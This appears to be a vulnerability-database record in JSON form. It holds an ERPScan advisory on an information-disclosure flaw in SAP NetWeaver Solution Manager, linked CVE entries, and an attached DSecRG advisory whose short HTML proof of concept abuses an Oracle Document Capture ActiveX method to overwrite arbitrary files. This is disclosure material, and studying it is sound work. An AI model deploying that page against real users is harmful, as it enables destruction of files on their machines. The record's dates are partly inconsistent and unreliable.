SAP NetWeaver Solution Manager - Missing Authorization Check & Information Disclosure
2011-07-12T00:00:00
ID ERPSCAN-14-004 Type erpscan Reporter ERPScan Modified 2011-07-12T00:00:00
Description
None
{"type": "erpscan", "published": "2011-07-12T00:00:00", "href": "https://erpscan.com/advisories/erpscan-14-004-sap-netweaver-solution-manager-missing-authorization-check-information-disclosure/", "objectVersion": "1.2", "bulletinFamily": "info", "cvelist": [], "cvss": {"vector": "NONE", "score": 0.0}, "hash": "6966647a496ca90caa164cde21e487cb4d033f034a64fd4ca87f37bc2ef706e1", "enchantments": {"score": {"value": 4.9, "vector": "NONE", "modified": "2017-04-02T11:20:38"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-2812", "CVE-2014-1960"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:97866"]}], "modified": "2017-04-02T11:20:38"}, "vulnersScore": 4.9}, "lastseen": "2017-04-02T11:20:38", "viewCount": 2, "id": "ERPSCAN-14-004", "history": [{"lastseen": "2017-02-25T09:02:29", "edition": 2, "bulletin": {"type": "erpscan", "published": "2011-07-12T00:00:00", "href": "https://erpscan.com/advisories/erpscan-14-004-sap-netweaver-solution-manager-missing-authorization-check-information-disclosure/", "objectVersion": "1.2", "bulletinFamily": "info", "id": "ERPSCAN-14-004", "cvss": {"vector": "NONE", "score": 0.0}, "hash": "9fa0787d77f51a542154aeba6fbd76488272dbe3e66043bfd5b6fee490e2ef8a", "lastseen": "2017-02-25T09:02:29", "viewCount": 2, "cvelist": [], "history": [], "references": [], "edition": 2, "hashmap": [{"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "href", "hash": "a81011554a108555a7b32bd0b8dcd37a"}, {"key": "modified", "hash": "3c89bea99b7b047836f32f25e27a69cc"}, {"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "title", "hash": "c3c12da4cd09877d784e2de9fd729049"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "type", "hash": "7aa987ad7e8c4c07b62c1208b7cdb9ec"}, {"key": "published", "hash": "3c89bea99b7b047836f32f25e27a69cc"}, {"key": "reporter", "hash": "3947727f374f901847df03b135f014cf"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "76898eb13a1d549f989d002903d69272"}], "reporter": "ERPScan", "modified": "2011-07-12T00:00:00", "title": "SAP NetWeaver Solution Manager - Missing Authorization Check & Information Disclosure", "description": "**Application:** SAP NetWeaver Solution Manager \n**Versions Affected:** SAP NetWeaver Solution Manager \n**Vendor URL:** [http://www.sap.com ](<http://www.sap.com>) \n**Bugs:** Missing Authorization Check & Information Disclosure \n**Reported:** 07.12.2011 \n**Vendor response:** 08.12.2011 \n**Date of Public Advisory:** 25.01.2014 \n**Reference:** SAP Security Note [1828885](<https://service.sap.com/sap/support/notes/1828885>) \n**CVSS:** AV:N/AC:L/AU:N/C:P/I:N/A:N 5.0 \n**Author:** Evgeny Neyolov (ERPScan)\n\n**Description** \nSAP NetWeaver Solution Manager is vulnerable to information disclosure through missing authorization check.\n\n**Business Risk** \nAn attacker can use an information disclosure vulnerability for revealing additional information (system data, debugging information, etc.) which will help to learn more about the system and to plan other attacks.\n\n**Defense**\n\nTo prevent this issue as well as a plethora of other vulnerabilities that may affect your systems, ERPScan provides the following services:\n\n * [SAP Vulnerability Assessment](<http://erpscan.com/services-2/sap-vulnerability-assessment/>)\n * [SAP Security Assessment](<http://erpscan.com/services-2/sap-security-assessment/>)\n * [SAP Security Trainings](<http://erpscan.com/services-2/sap-security-trainings/>)\n * [SAP Custom code security review](<http://erpscan.com/services-2/sap-custom-code-security-review/>)\n * [SAP Penetration testing](<http://erpscan.com/services-2/sap-penetration-testing/>)\n"}, "differentElements": ["description"]}, {"lastseen": "2017-01-08T12:24:44", "edition": 1, "bulletin": {"type": "erpscan", "published": "2014-01-31T23:43:25", "href": "https://erpscan.com/advisories/erpscan-14-004-sap-netweaver-solution-manager-missing-authorization-check-information-disclosure/", "objectVersion": "1.2", "bulletinFamily": "info", "id": "ERPSCAN-14-004", "cvss": {"vector": "NONE", "score": 0.0}, "hash": "b679a65840248432d04c76c16905e17a02e842ed057572895fc23f8f140f36e8", "lastseen": "2017-01-08T12:24:44", "viewCount": 2, "cvelist": [], "history": [], "references": [], "edition": 1, "hashmap": [{"key": "modified", "hash": "6a91291ba7b4d76eabc5de47e38b841f"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "href", "hash": "a81011554a108555a7b32bd0b8dcd37a"}, {"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "title", "hash": "c3c12da4cd09877d784e2de9fd729049"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "type", "hash": "7aa987ad7e8c4c07b62c1208b7cdb9ec"}, {"key": "reporter", "hash": "3947727f374f901847df03b135f014cf"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "published", "hash": "7aa96d96bf7f774adbf65b78a62c3986"}, {"key": "description", "hash": "76898eb13a1d549f989d002903d69272"}], "reporter": "ERPScan", "modified": "2015-09-28T12:19:34", "title": "SAP NetWeaver Solution Manager - Missing Authorization Check & Information Disclosure", "description": "**Application:** SAP NetWeaver Solution Manager \n**Versions Affected:** SAP NetWeaver Solution Manager \n**Vendor URL:** [http://www.sap.com ](<http://www.sap.com>) \n**Bugs:** Missing Authorization Check & Information Disclosure \n**Reported:** 07.12.2011 \n**Vendor response:** 08.12.2011 \n**Date of Public Advisory:** 25.01.2014 \n**Reference:** SAP Security Note [1828885](<https://service.sap.com/sap/support/notes/1828885>) \n**CVSS:** AV:N/AC:L/AU:N/C:P/I:N/A:N 5.0 \n**Author:** Evgeny Neyolov (ERPScan)\n\n**Description** \nSAP NetWeaver Solution Manager is vulnerable to information disclosure through missing authorization check.\n\n**Business Risk** \nAn attacker can use an information disclosure vulnerability for revealing additional information (system data, debugging information, etc.) which will help to learn more about the system and to plan other attacks.\n\n**Defense**\n\nTo prevent this issue as well as a plethora of other vulnerabilities that may affect your systems, ERPScan provides the following services:\n\n * [SAP Vulnerability Assessment](<http://erpscan.com/services-2/sap-vulnerability-assessment/>)\n * [SAP Security Assessment](<http://erpscan.com/services-2/sap-security-assessment/>)\n * [SAP Security Trainings](<http://erpscan.com/services-2/sap-security-trainings/>)\n * [SAP Custom code security review](<http://erpscan.com/services-2/sap-custom-code-security-review/>)\n * [SAP Penetration testing](<http://erpscan.com/services-2/sap-penetration-testing/>)\n"}, "differentElements": ["published", "modified"]}], "references": [], "edition": 3, "hashmap": [{"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "08e9de24ab150d083240557cec091d53"}, {"key": "href", "hash": "a81011554a108555a7b32bd0b8dcd37a"}, {"key": "modified", "hash": "3c89bea99b7b047836f32f25e27a69cc"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "3c89bea99b7b047836f32f25e27a69cc"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "3947727f374f901847df03b135f014cf"}, {"key": "title", "hash": "c3c12da4cd09877d784e2de9fd729049"}, {"key": "type", "hash": "7aa987ad7e8c4c07b62c1208b7cdb9ec"}], "reporter": "ERPScan", "modified": "2011-07-12T00:00:00", "title": "SAP NetWeaver Solution Manager - Missing Authorization Check & Information Disclosure", "description": "None\n"}
{"cve": [{"lastseen": "2019-05-29T18:14:41", "bulletinFamily": "NVD", "description": "XML external entity (XXE) vulnerability in XMLValidationComponent in SAP NetWeaver Portal 7.31.201109172004 allows remote attackers to send requests to intranet servers via crafted XML, aka SAP Security Note 2093966.\n<a href=\"http://cwe.mitre.org/data/definitions/611.html\">CWE-611: Improper Restriction of XML External Entity Reference ('XXE')</a>", "modified": "2018-12-10T19:29:00", "id": "CVE-2015-2812", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2812", "published": "2015-04-01T14:59:00", "title": "CVE-2015-2812", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:13:44", "bulletinFamily": "NVD", "description": "The Solution Manager in SAP NetWeaver does not properly restrict access, which allows remote attackers to obtain sensitive information via unspecified vectors.", "modified": "2018-12-10T19:29:00", "id": "CVE-2014-1960", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1960", "published": "2014-02-14T15:55:00", "title": "CVE-2014-1960", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:41", "bulletinFamily": "exploit", "description": "", "modified": "2011-01-25T00:00:00", "published": "2011-01-25T00:00:00", "href": "https://packetstormsecurity.com/files/97866/Oracle-Document-Capture-Actbar2.ocx-Insecure-Method.html", "id": "PACKETSTORM:97866", "title": "Oracle Document Capture Actbar2.ocx Insecure Method", "type": "packetstorm", "sourceData": "`ActiveX components contain insecure methods. \n \nDigital Security Research Group [DSecRG] Advisory #DSECRG-00153 \n \n \n \nApplication: Oracle Document Capture \nVersions Affected: Release 10gR3 \nVendor URL: www.oracle.com \nBugs: insecure method, File overwriting \nExploits: YES \nReported: 22.03.2010 \nVendor response: 31.03.2010 \nDate of Public Advisory:24.01.2011 \nCVE-number: CVE-2010-3591 \nAuthor: Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) \n \n \n \nDescription \n*********** \n \nOracle Document Capture contains ActiveX components that contains insecure methods. \n \nInsecure method in Actbar2.ocx \n \n \nDetails \n******* \n \nOracle Document Capture contains ActiveX component ActiveBar2Library (Actbar2.ocx) Lib GUID: {4932CEF1-2CAA-11D2-A165-0060081C43D9} \n \nwhich is contains insecure method \"SaveLayoutChanges\" that can overwrite any unhidden file in system. \n \nClass ActiveBar2 \nGUID: {4932CEF4-2CAA-11D2-A165-0060081C43D9} \nNumber of Interfaces: 1 \nDefault Interface: IActiveBar2 \nRegKey Safe for Script: True \nRegKey Safe for Init: True \nKillBitSet: False \n \n \n \nExploit \n******* \n \nAttacker can construct html page which call vulnerable function \"SaveLayoutChanges\" from ActiveX component Actbar2.ocx \n \nExample: \n \n<HTML> \n<HEAD> \n<TITLE>DSecRG</TITLE> \n</HEAD> \n<BODY> \n \n<OBJECT id='eds' classid='clsid:4932CEF4-2CAA-11D2-A165-0060081C43D9'></OBJECT> \n \n<SCRIPT> \n \nfunction Exploit(){ \neds.SaveLayoutChanges(\"C:\\\\31337.txt\",1); \n} \nExploit(); \n \n</SCRIPT> \n</BODY> \n</HTML> \n \n \n \nReferences \n********** \n \nhttp://dsecrg.com/pages/vul/show.php?id=304 \nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html \n \n \n \n \nFix Information \n************* \n \nInformation was published in CPU Jan 2011. \nAll customers can download CPU patches following instructions from: \n \nhttp://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html \n \n \nAbout \n***** \n \nDigital Security: \n \nIs one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards. \n \nDigital Security Research Group: \n \nInternational subdivision of Digital Security company focused on research and software development for securing business-critical systems like: enterprise applications (ERP,CRM,SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed new product \"ERPSCAN security suite for SAP NetWeaver\" and service \"ERPSCAN Online\" which can help customers to perform automated security assessments and compliance checks for SAP solutions. \n \n \nContact: research [at] dsecrg [dot] com \nhttp://www.dsecrg.com \nhttp://www.erpscan.com \n \n \n \n \n \nPolyakov Alexandr. PCI QSA,PA-QSA \nCTO Digital Security \nHead of DSecRG \n______________________ \nDIGITAL SECURITY \nphone: +7 812 703 1547 \n+7 812 430 9130 \ne-mail: a.polyakov@dsec.ru \n \nwww.dsec.ru \nwww.dsecrg.com www.dsecrg.ru \nwww.erpscan.com www.erpscan.ru \nwww.pcidssru.com www.pcidss.ru \n \n \n----------------------------------- \nThis message and any attachment are confidential and may be privileged or otherwise protected \nfrom disclosure. If you are not the intended recipient any use, distribution, copying or disclosure \nis strictly prohibited. If you have received this message in error, please notify the sender immediately \neither by telephone or by e-mail and delete this message and any attachment from your system. Correspondence \nvia e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding \nstatements by e-mail unless otherwise agreed. \n----------------------------------- \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/97866/DSECRG-11-004.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
